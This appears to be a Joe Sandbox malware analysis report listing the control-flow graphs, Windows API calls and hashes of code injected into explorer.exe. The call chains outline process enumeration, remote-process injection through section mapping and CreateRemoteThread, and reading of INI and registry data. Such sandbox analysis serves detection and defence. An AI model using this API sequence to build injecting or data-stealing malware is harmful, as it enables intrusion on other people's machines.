                                                                                                                                        control_flow_graph 31 cda298-cda29b 32 cda2a5-cda2a9 31->32 33 cda2ab-cda2b3 32->33 34 cda2b5 32->34 33->34 35 cda29d-cda2a3 34->35 36 cda2b7 34->36 35->32 37 cda2ba-cda2c1 36->37 39 cda2cd 37->39 40 cda2c3-cda2cb 37->40 39->37 41 cda2cf-cda2d2 39->41 40->39 42 cda2d4-cda2e2 41->42 43 cda2e7-cda2f4 41->43 44 cda31e-cda339 42->44 45 cda2e4-cda2e5 42->45 55 cda30e-cda31c call cda25a 43->55 56 cda2f6-cda2f8 43->56 46 cda36a-cda36d 44->46 45->43 48 cda36f-cda370 46->48 49 cda372-cda379 46->49 50 cda351-cda355 48->50 51 cda37f-cda383 49->51 53 cda33b-cda33e 50->53 54 cda357-cda35a 50->54 57 cda385-cda39e LoadLibraryA 51->57 58 cda3e0-cda3e9 51->58 53->49 64 cda340 53->64 54->49 59 cda35c-cda360 54->59 55->32 60 cda2fb-cda302 56->60 63 cda39f-cda3a6 57->63 61 cda3ec-cda3f5 58->61 65 cda341-cda345 59->65 66 cda362-cda369 59->66 78 cda30c 60->78 79 cda304-cda30a 60->79 67 cda41a-cda46a VirtualProtect * 2 61->67 68 cda3f7-cda3f9 61->68 63->51 70 cda3a8 63->70 64->65 65->50 77 cda347-cda349 65->77 66->46 74 cda46e-cda473 67->74 72 cda40c-cda418 68->72 73 cda3fb-cda40a 68->73 75 cda3aa-cda3b2 70->75 76 cda3b4-cda3bc 70->76 72->73 73->61 74->74 80 cda475-cda484 74->80 81 cda3be-cda3ca 75->81 76->81 77->50 82 cda34b-cda34f 77->82 78->55 78->60 79->78 85 cda3cc-cda3d3 81->85 86 cda3d5-cda3df 81->86 82->50 82->54 85->63
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNELBASE ref: 00CDA397
                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00CDA441
                                                                                                                                        • VirtualProtect.KERNELBASE ref: 00CDA45F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD9000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD9000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd9000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 895956442-0
                                                                                                                                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                        • Instruction ID: 58190240237f4911a929fb40dbe2bcc2b0b3c080442d9a11ae811a6ccc8089c9
                                                                                                                                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                                                        • Instruction Fuzzy Hash: 7E517B32758D1D4BCB24AB7D9CC43F5B3D2F759321B18062BC6AAC3394D659D9468383
                                                                                                                                        Function 00CD3254 Relevance: 4.7, APIs: 3, Instructions: 210COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 87 cd3254-cd3287 call cd298c 90 cd328d-cd3297 call cd298c 87->90 91 cd343a-cd3456 87->91 90->91 94 cd329d-cd32aa call cd272c 90->94 97 cd32ac-cd32b3 94->97 98 cd32b5 94->98 99 cd32b7-cd32c2 call cd2688 97->99 98->99 102 cd342c-cd3435 call cd30a8 99->102 103 cd32c8-cd32fe call cd2688 call cd1838 * 2 call cd2938 99->103 102->91 113 cd340c-cd3427 call cd1860 * 4 103->113 114 cd3304-cd3318 GetPrivateProfileSectionNamesW 103->114 113->102 114->113 116 cd331e-cd3326 114->116 116->113 118 cd332c-cd332f 116->118 118->113 120 cd3335-cd3348 118->120 124 cd334e-cd3377 GetPrivateProfileStringW 120->124 125 cd33f0-cd3406 120->125 124->125 127 cd3379-cd3398 GetPrivateProfileIntW 124->127 125->113 125->118 130 cd339a-cd33ad call cd2688 127->130 131 cd33e5-cd33eb call cd30a8 127->131 135 cd33af-cd33b3 130->135 136 cd33c6-cd33e3 call cd30a8 call cd1860 130->136 131->125 137 cd33bd-cd33c4 135->137 138 cd33b5-cd33ba 135->138 136->125 137->135 137->136 138->137
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00CD298C: GetFileAttributesW.KERNELBASE ref: 00CD299E
                                                                                                                                        • GetPrivateProfileSectionNamesW.KERNEL32 ref: 00CD330F
                                                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 00CD336F
                                                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 00CD338C
                                                                                                                                          • Part of subcall function 00CD30A8: FindFirstFileW.KERNELBASE ref: 00CD3104
                                                                                                                                          • Part of subcall function 00CD1860: RtlFreeHeap.NTDLL ref: 00CD1880
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 970345848-0
                                                                                                                                        • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                        • Instruction ID: 3e2769eba35e02b15745bedafd0d47ff4642b4af7798e971c210e2bca119bbcc
                                                                                                                                        • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                                                        • Instruction Fuzzy Hash: C251C830718F494FDB59BB2C985667973D2EB98300B44056FE50AC33A6EE68DE429387
                                                                                                                                        Function 00CD3458 Relevance: 4.7, APIs: 3, Instructions: 172registryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • StrStrIW.KERNELBASE ref: 00CD347E
                                                                                                                                        • RegOpenKeyExW.KERNELBASE ref: 00CD353F
                                                                                                                                        • RegEnumKeyExW.KERNELBASE ref: 00CD35D6
                                                                                                                                          • Part of subcall function 00CD2774: RegOpenKeyExW.KERNELBASE ref: 00CD27C7
                                                                                                                                          • Part of subcall function 00CD2774: RegQueryValueExW.KERNELBASE ref: 00CD27F4
                                                                                                                                          • Part of subcall function 00CD2774: RegQueryValueExW.KERNELBASE ref: 00CD283A
                                                                                                                                          • Part of subcall function 00CD2774: RegCloseKey.KERNELBASE ref: 00CD2860
                                                                                                                                          • Part of subcall function 00CD3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00CD330F
                                                                                                                                          • Part of subcall function 00CD1860: RtlFreeHeap.NTDLL ref: 00CD1880
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1841478724-0
                                                                                                                                        • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                        • Instruction ID: 532dbf9ff45ba5a11511f8ceba21a2d0629c736112453e8dbab0d4ca605cb3ec
                                                                                                                                        • Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                                                        • Instruction Fuzzy Hash: 2C416C30718B484FDB98EF6D989972AB6E1FBA8340F04056FA64EC33A1DE34D9049742
                                                                                                                                        Function 00CD2938 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 232 cd2938-cd2943 233 cd2945-cd2948 232->233 234 cd2984 232->234 233->234 235 cd294a-cd2970 CreateFileW 233->235 236 cd2986-cd298b 234->236 237 cd2980-cd2982 235->237 238 cd2972-cd297a CloseHandle 235->238 237->236 238->237
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3498533004-0
                                                                                                                                        • Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                        • Instruction ID: ec0af98eedff929190eda62d0642102516939b4f0c154fdb73f5c61f5a3400b5
                                                                                                                                        • Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
                                                                                                                                        • Instruction Fuzzy Hash: 2CF09B7021570A4FE7546FB944A8336F5D0FB58355F18473FE56AC23D0D73589468742
                                                                                                                                        Function 00CD22B4 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 251 cd22b4-cd22c6 252 cd22c8-cd22d0 CreateStreamOnHGlobal 251->252 253 cd22d6-cd22e6 251->253 252->253
                                                                                                                                        APIs
                                                                                                                                        • CreateStreamOnHGlobal.COMBASE ref: 00CD22D0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateGlobalStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2244384528-0
                                                                                                                                        • Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                        • Instruction ID: 1424638a0b81a80592d31abe9665812c92e2a01a8318d9842ccdb6f5896c017e
                                                                                                                                        • Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
                                                                                                                                        • Instruction Fuzzy Hash: F4E08C30108B0A8FD758AFBCE4CA07A33A1EBAC252B05053FE005CB114D27988C18741
                                                                                                                                        Function 00CD298C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 254 cd298c-cd2997 255 cd2999-cd299c 254->255 256 cd29b5 254->256 255->256 258 cd299e-cd29a7 GetFileAttributesW 255->258 257 cd29b7-cd29bc 256->257 259 cd29a9-cd29af 258->259 260 cd29b1-cd29b3 258->260 259->260 260->257
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE ref: 00CD299E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                        • Instruction ID: 7c4c1690b719600eab60d748d600d57a62179ad355cbe52532f2fe6f330f9d76
                                                                                                                                        • Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
                                                                                                                                        • Instruction Fuzzy Hash: DAD0A722732905077B6426FA08FD27130A0D73933AF14033BEB36C13E0E285CED5A201
                                                                                                                                        Function 00CD1860 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 261 cd1860-cd1870 call cd1ad4 264 cd1886-cd188b 261->264 265 cd1872-cd1880 RtlFreeHeap 261->265 265->264
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000F.00000002.2707640734.0000000000CD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CD1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_15_2_cd1000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                        • Instruction ID: 906c5f5480795516f80189ca7738020dd837821f30b6fb5d641866e8c74cc002
                                                                                                                                        • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                                                                                        • Instruction Fuzzy Hash: E8D01224716A041BEF2CBBFA1C8D174BAD2E758212B1D8066BD19C3392ED39C895D341

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.3%
                                                                                                                                        Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                                        Signature Coverage:27.5%
                                                                                                                                        Total number of Nodes:306
                                                                                                                                        Total number of Limit Nodes:42
                                                                                                                                        execution_graph 985 141425 986 141432 985->986 987 14144b 985->987 988 142608 VirtualQuery 986->988 989 14143a 988->989 989->987 990 141493 23 API calls 989->990 990->987 991 142806 VirtualFree 992 141eb6 993 141ecc lstrlen 992->993 994 141ed9 992->994 993->994 1003 142861 GetProcessHeap RtlAllocateHeap 994->1003 996 141ee1 lstrcat 997 141f16 lstrcat 996->997 998 141f1d 996->998 997->998 1004 141f4a 998->1004 1001 142843 3 API calls 1002 141f40 1001->1002 1003->996 1038 1422b8 1004->1038 1008 141f77 1043 1427e2 lstrlen MultiByteToWideChar 1008->1043 1010 141f86 1044 142374 RtlZeroMemory 1010->1044 1013 141fd8 RtlZeroMemory 1016 14200d 1013->1016 1014 142843 3 API calls 1015 141f2d 1014->1015 1015->1001 1017 14229a 1016->1017 1021 14203b 1016->1021 1046 1422e5 1016->1046 1017->1014 1019 142280 1019->1017 1020 142843 3 API calls 1019->1020 1020->1017 1021->1019 1055 142861 GetProcessHeap RtlAllocateHeap 1021->1055 1023 14210b wsprintfW 1024 142131 1023->1024 1028 14219e 1024->1028 1056 142861 GetProcessHeap RtlAllocateHeap 1024->1056 1026 14216b wsprintfW 1026->1028 1027 14225d 1029 142843 3 API calls 1027->1029 1028->1027 1057 142861 GetProcessHeap RtlAllocateHeap 1028->1057 1031 142271 1029->1031 1031->1019 1032 142843 3 API calls 1031->1032 1032->1019 1033 142256 1036 142843 3 API calls 1033->1036 1034 1421e9 1034->1033 1058 142815 VirtualAlloc 1034->1058 1036->1027 1037 142243 RtlMoveMemory 1037->1033 1039 141f69 1038->1039 1040 1422c2 1038->1040 1042 142861 GetProcessHeap RtlAllocateHeap 1039->1042 1041 1426e6 2 API calls 1040->1041 1041->1039 1042->1008 1043->1010 1045 141f96 1044->1045 1045->1013 1045->1017 1047 142353 1046->1047 1049 1422f2 1046->1049 1047->1021 1048 1422f6 DnsQuery_W 1048->1049 1049->1047 1049->1048 1050 142335 DnsFree inet_ntoa 1049->1050 1050->1049 1051 142355 1050->1051 1059 142861 GetProcessHeap RtlAllocateHeap 1051->1059 1053 14235f 1060 1427e2 lstrlen MultiByteToWideChar 1053->1060 1055->1023 1056->1026 1057->1034 1058->1037 1059->1053 1060->1047 707 141000 708 141007 707->708 709 141010 707->709 711 141016 708->711 760 142608 VirtualQuery 711->760 714 141097 714->709 716 14102c RtlMoveMemory 717 141071 NtUnmapViewOfSection GetCurrentProcessId 716->717 718 14104d 716->718 720 141092 717->720 721 14109e 717->721 797 142861 GetProcessHeap RtlAllocateHeap 718->797 720->714 723 141095 720->723 763 1410a4 721->763 722 141052 RtlMoveMemory 722->717 798 141332 723->798 725 1410a3 727 142861 GetProcessHeap RtlAllocateHeap 725->727 728 1410cc 727->728 729 1410dc CreateToolhelp32Snapshot 728->729 730 1410f0 Process32First 729->730 731 141322 Sleep 729->731 732 14110c lstrcmpiA 730->732 733 14131b CloseHandle 730->733 731->729 734 141124 lstrcmpiA 732->734 747 141280 732->747 733->731 735 141138 lstrcmpiA 734->735 734->747 737 14114c lstrcmpiA 735->737 735->747 736 1425ad OpenProcess IsWow64Process IsWow64Process CloseHandle 736->747 738 141160 lstrcmpiA 737->738 737->747 740 141170 lstrcmpiA 738->740 738->747 739 141305 Process32Next 739->732 741 141319 739->741 742 141184 lstrcmpiA 740->742 740->747 741->733 743 141198 lstrcmpiA 742->743 742->747 744 1411ac lstrcmpiA 743->744 743->747 745 1411c0 lstrcmpiA 744->745 744->747 746 1411d4 lstrcmpiA 745->746 745->747 746->747 748 1411e8 lstrcmpiA 746->748 747->736 747->739 749 142608 VirtualQuery 747->749 751 1412ae lstrcmpiA 747->751 756 141819 30 API calls 747->756 748->747 750 1411fc lstrcmpiA 748->750 749->747 750->747 752 14120c lstrcmpiA 750->752 751->747 752->747 753 14121c lstrcmpiA 752->753 753->747 754 14122c lstrcmpiA 753->754 754->747 755 14123c lstrcmpiA 754->755 755->747 757 14124c lstrcmpiA 755->757 756->747 757->747 758 14125c lstrcmpiA 757->758 758->747 759 14126c lstrcmpiA 758->759 759->739 759->747 761 14101e 760->761 761->714 762 142861 GetProcessHeap RtlAllocateHeap 761->762 762->716 825 142861 GetProcessHeap RtlAllocateHeap 763->825 765 1410cc 766 1410dc CreateToolhelp32Snapshot 765->766 767 1410f0 Process32First 766->767 768 141322 Sleep 766->768 769 14110c lstrcmpiA 767->769 770 14131b CloseHandle 767->770 768->766 771 141124 lstrcmpiA 769->771 772 141280 769->772 770->768 771->772 773 141138 lstrcmpiA 771->773 777 141305 Process32Next 772->777 786 142608 VirtualQuery 772->786 788 1412ae lstrcmpiA 772->788 826 1425ad OpenProcess 772->826 832 141819 772->832 773->772 775 14114c lstrcmpiA 773->775 775->772 776 141160 lstrcmpiA 775->776 776->772 778 141170 lstrcmpiA 776->778 777->769 779 141319 777->779 778->772 780 141184 lstrcmpiA 778->780 779->770 780->772 781 141198 lstrcmpiA 780->781 781->772 782 1411ac lstrcmpiA 781->782 782->772 783 1411c0 lstrcmpiA 782->783 783->772 784 1411d4 lstrcmpiA 783->784 784->772 785 1411e8 lstrcmpiA 784->785 785->772 787 1411fc lstrcmpiA 785->787 786->772 787->772 789 14120c lstrcmpiA 787->789 788->772 789->772 790 14121c lstrcmpiA 789->790 790->772 791 14122c lstrcmpiA 790->791 791->772 792 14123c lstrcmpiA 791->792 792->772 794 14124c lstrcmpiA 792->794 794->772 795 14125c lstrcmpiA 794->795 795->772 796 14126c lstrcmpiA 795->796 796->772 796->777 797->722 878 142861 GetProcessHeap RtlAllocateHeap 798->878 800 141340 GetModuleFileNameA 879 142861 GetProcessHeap RtlAllocateHeap 800->879 802 141357 GetCurrentProcessId wsprintfA 880 14263e CryptAcquireContextA 802->880 805 14139c Sleep 885 1424d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 805->885 806 14140d 903 142843 806->903 810 1413ae GetModuleHandleA GetProcAddress 812 1413c9 810->812 813 1413da GetModuleHandleA GetProcAddress 810->813 811 142843 3 API calls 814 14141b RtlExitUserThread 811->814 893 141de3 812->893 816 1413f5 813->816 817 141406 813->817 820 141425 814->820 818 141de3 3 API calls 816->818 819 1424d5 10 API calls 817->819 818->817 819->806 821 14144b 820->821 822 142608 VirtualQuery 820->822 821->721 823 14143a 822->823 823->821 908 141493 823->908 825->765 827 142600 826->827 828 1425cb IsWow64Process 826->828 827->772 829 1425ee 828->829 830 1425dc IsWow64Process 828->830 831 1425f9 CloseHandle 829->831 830->829 830->831 831->827 833 142608 VirtualQuery 832->833 834 141833 833->834 835 141845 OpenProcess 834->835 836 141a76 834->836 835->836 837 14185e 835->837 836->772 838 142608 VirtualQuery 837->838 839 141865 838->839 839->836 840 141873 NtSetInformationProcess 839->840 841 14188f 839->841 840->841 863 141a80 841->863 844 141a80 2 API calls 845 1418d6 844->845 846 141a73 CloseHandle 845->846 847 141a80 2 API calls 845->847 846->836 848 141900 847->848 869 141b17 848->869 851 141a80 2 API calls 852 141930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 851->852 853 141985 852->853 854 141a4e CreateRemoteThread 852->854 855 14198b CreateMutexA GetLastError 853->855 859 1419bb GetModuleHandleA GetProcAddress ReadProcessMemory 853->859 856 141a65 CloseHandle 854->856 855->853 857 1419a7 CloseHandle Sleep 855->857 858 141a67 CloseHandle CloseHandle 856->858 857->855 858->846 860 141a47 859->860 861 1419ec WriteProcessMemory 859->861 860->856 860->858 861->860 862 141a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 861->862 862->860 864 141a94 863->864 867 1418b4 863->867 865 141aa4 NtCreateSection 864->865 866 141ac3 864->866 865->866 866->867 868 141ad8 NtMapViewOfSection 866->868 867->844 868->867 870 141b2e 869->870 876 141b60 869->876 871 141b30 RtlMoveMemory 870->871 871->871 871->876 872 141bc3 873 141910 NtUnmapViewOfSection 872->873 875 141be1 LdrProcessRelocationBlock 872->875 873->851 874 141b71 LoadLibraryA 874->873 874->876 875->872 875->873 876->872 876->874 877 141ba1 GetProcAddress 876->877 877->873 877->876 878->800 879->802 881 142664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 880->881 882 141384 CreateMutexA GetLastError 880->882 883 1426aa wsprintfA 881->883 882->805 882->806 883->883 884 1426cc CryptDestroyHash CryptReleaseContext 883->884 884->882 886 142515 885->886 887 142565 CloseHandle 886->887 888 142555 Thread32Next 886->888 889 142521 OpenThread 886->889 887->810 888->886 890 142544 ResumeThread 889->890 891 14253c SuspendThread 889->891 892 14254a CloseHandle 890->892 891->892 892->888 894 141e56 893->894 895 141ded 893->895 894->813 895->894 935 141e93 VirtualProtect 895->935 897 141e04 897->894 936 142815 VirtualAlloc 897->936 899 141e10 900 141e1a RtlMoveMemory 899->900 901 141e2d 899->901 900->901 937 141e93 VirtualProtect 901->937 904 142608 VirtualQuery 903->904 905 14284b 904->905 906 141414 905->906 907 14284f GetProcessHeap HeapFree 905->907 906->811 907->906 909 1414c0 908->909 910 1414a1 908->910 911 141510 909->911 912 1414c8 909->912 938 1417c7 910->938 957 1426e6 lstrlen lstrlen 911->957 915 1417c7 5 API calls 912->915 932 1414b6 912->932 917 1414e0 915->917 917->932 945 141647 917->945 918 14155f 919 1426e6 2 API calls 918->919 921 14156c 919->921 925 141584 921->925 926 1415a0 921->926 921->932 922 141532 959 141752 GetModuleHandleA GetProcAddress 922->959 962 142404 lstrlen 925->962 928 142404 5 API calls 926->928 926->932 931 1415ac 928->931 929 141647 11 API calls 929->932 931->932 933 141647 11 API calls 931->933 932->821 934 1414fb 933->934 934->932 968 1415e0 934->968 935->897 936->899 937->894 939 1417d1 938->939 940 141812 938->940 939->940 941 1426e6 2 API calls 939->941 940->932 942 1417f1 941->942 942->940 973 142861 GetProcessHeap RtlAllocateHeap 942->973 944 141804 RtlMoveMemory 944->940 946 141660 945->946 956 141745 945->956 947 141671 lstrlen 946->947 946->956 948 141683 lstrlen 947->948 947->956 949 141690 getpeername 948->949 948->956 950 1416ae inet_ntoa htons 949->950 949->956 951 1416cc 950->951 950->956 951->956 974 142861 GetProcessHeap RtlAllocateHeap 951->974 953 141717 wsprintfA 954 14173a 953->954 955 142843 3 API calls 954->955 954->956 955->956 956->934 958 14151d 957->958 958->918 958->922 960 141776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 959->960 961 141539 959->961 960->961 961->929 961->932 963 142456 962->963 964 14241c CryptStringToBinaryA 962->964 963->932 964->963 965 142438 964->965 975 142861 GetProcessHeap RtlAllocateHeap 965->975 967 142444 CryptStringToBinaryA 967->963 969 142843 3 API calls 968->969 970 1415f5 969->970 971 142843 3 API calls 970->971 972 1415fc 971->972 972->932 973->944 974->953 975->967 1061 14245e lstrlen 1062 1424a5 1061->1062 1063 142476 CryptBinaryToStringA 1061->1063 1063->1062 1064 142489 1063->1064 1067 142861 GetProcessHeap RtlAllocateHeap 1064->1067 1066 142494 CryptBinaryToStringA 1066->1062 1067->1066 976 147728 977 147904 976->977 978 14774b 976->978 977->977 979 14785a LoadLibraryA 978->979 983 14789f VirtualProtect VirtualProtect 978->983 980 147871 979->980 980->978 982 147883 GetProcAddress 980->982 982->980 984 147899 982->984 983->977

                                                                                                                                        Callgraph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        • Opacity -> Relevance
                                                                                                                                        • Disassembly available
                                                                                                                                        callgraph 0 Function_001424D5 1 Function_00142815 2 Function_00141016 5 Function_00142592 2->5 11 Function_00141819 2->11 23 Function_00142608 2->23 27 Function_00142731 2->27 28 Function_00141332 2->28 29 Function_00142573 2->29 32 Function_001410A4 2->32 37 Function_00142861 2->37 40 Function_001425AD 2->40 3 Function_00141B17 4 Function_00143417 6 Function_00141752 7 Function_00141493 7->6 13 Function_00142404 7->13 15 Function_00141647 7->15 16 Function_001417C7 7->16 35 Function_001426E6 7->35 36 Function_001415E0 7->36 8 Function_00141E93 9 Function_00141E5D 19 Function_00141D80 9->19 10 Function_0014245E 10->37 11->3 17 Function_00141A80 11->17 11->23 12 Function_00141C19 13->37 14 Function_00142806 22 Function_00142843 15->22 15->37 41 Function_001424AE 15->41 16->35 16->37 18 Function_00141DC0 18->12 19->12 20 Function_00141000 20->2 21 Function_00142841 22->23 24 Function_00141F4A 24->1 24->22 25 Function_00142374 24->25 24->27 31 Function_001422B8 24->31 34 Function_001422E5 24->34 24->37 38 Function_001427E2 24->38 26 Function_00141EB6 26->22 26->24 26->37 28->0 28->7 28->22 28->23 30 Function_0014263E 28->30 28->37 39 Function_00141DE3 28->39 31->35 32->5 32->11 32->23 32->27 32->29 32->37 32->40 33 Function_00141425 33->7 33->23 34->37 34->38 36->22 39->1 39->8 39->9 39->18 42 Function_00147728 43 Function_00141469 43->7 43->23

                                                                                                                                        Executed Functions

                                                                                                                                        Function 00141016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244stringsleepprocessCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 141016-141020 call 142608 3 141097-141098 0->3 4 141022-14104b call 142861 RtlMoveMemory 0->4 7 141071-141090 NtUnmapViewOfSection GetCurrentProcessId 4->7 8 14104d-14106b call 142861 RtlMoveMemory 4->8 10 141092-141093 7->10 11 14109e-1410d7 call 1410a4 call 142861 7->11 8->7 10->3 13 141095-141099 call 141332 10->13 21 1410dc-1410ea CreateToolhelp32Snapshot 11->21 13->11 22 1410f0-141106 Process32First 21->22 23 141322-14132d Sleep 21->23 24 14110c-14111e lstrcmpiA 22->24 25 14131b-14131c CloseHandle 22->25 23->21 26 141124-141132 lstrcmpiA 24->26 27 141280-141289 call 1425ad 24->27 25->23 26->27 28 141138-141146 lstrcmpiA 26->28 33 141305-141313 Process32Next 27->33 34 14128b-141294 call 142592 27->34 28->27 30 14114c-14115a lstrcmpiA 28->30 30->27 32 141160-14116a lstrcmpiA 30->32 32->27 35 141170-14117e lstrcmpiA 32->35 33->24 36 141319 33->36 34->33 41 141296-14129d call 142573 34->41 35->27 38 141184-141192 lstrcmpiA 35->38 36->25 38->27 40 141198-1411a6 lstrcmpiA 38->40 40->27 42 1411ac-1411ba lstrcmpiA 40->42 41->33 47 14129f-1412ac call 142608 41->47 42->27 44 1411c0-1411ce lstrcmpiA 42->44 44->27 46 1411d4-1411e2 lstrcmpiA 44->46 46->27 48 1411e8-1411f6 lstrcmpiA 46->48 47->33 52 1412ae-141300 lstrcmpiA call 142731 call 141819 call 142731 47->52 48->27 51 1411fc-14120a lstrcmpiA 48->51 51->27 53 14120c-14121a lstrcmpiA 51->53 52->33 53->27 55 14121c-14122a lstrcmpiA 53->55 55->27 56 14122c-14123a lstrcmpiA 55->56 56->27 58 14123c-14124a lstrcmpiA 56->58 58->27 60 14124c-14125a lstrcmpiA 58->60 60->27 62 14125c-14126a lstrcmpiA 60->62 62->27 64 14126c-14127a lstrcmpiA 62->64 64->27 64->33
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00142608: VirtualQuery.KERNEL32(00144434,?,0000001C), ref: 00142615
                                                                                                                                          • Part of subcall function 00142861: GetProcessHeap.KERNEL32(00000008,0000A000,001410CC), ref: 00142864
                                                                                                                                          • Part of subcall function 00142861: RtlAllocateHeap.NTDLL(00000000), ref: 0014286B
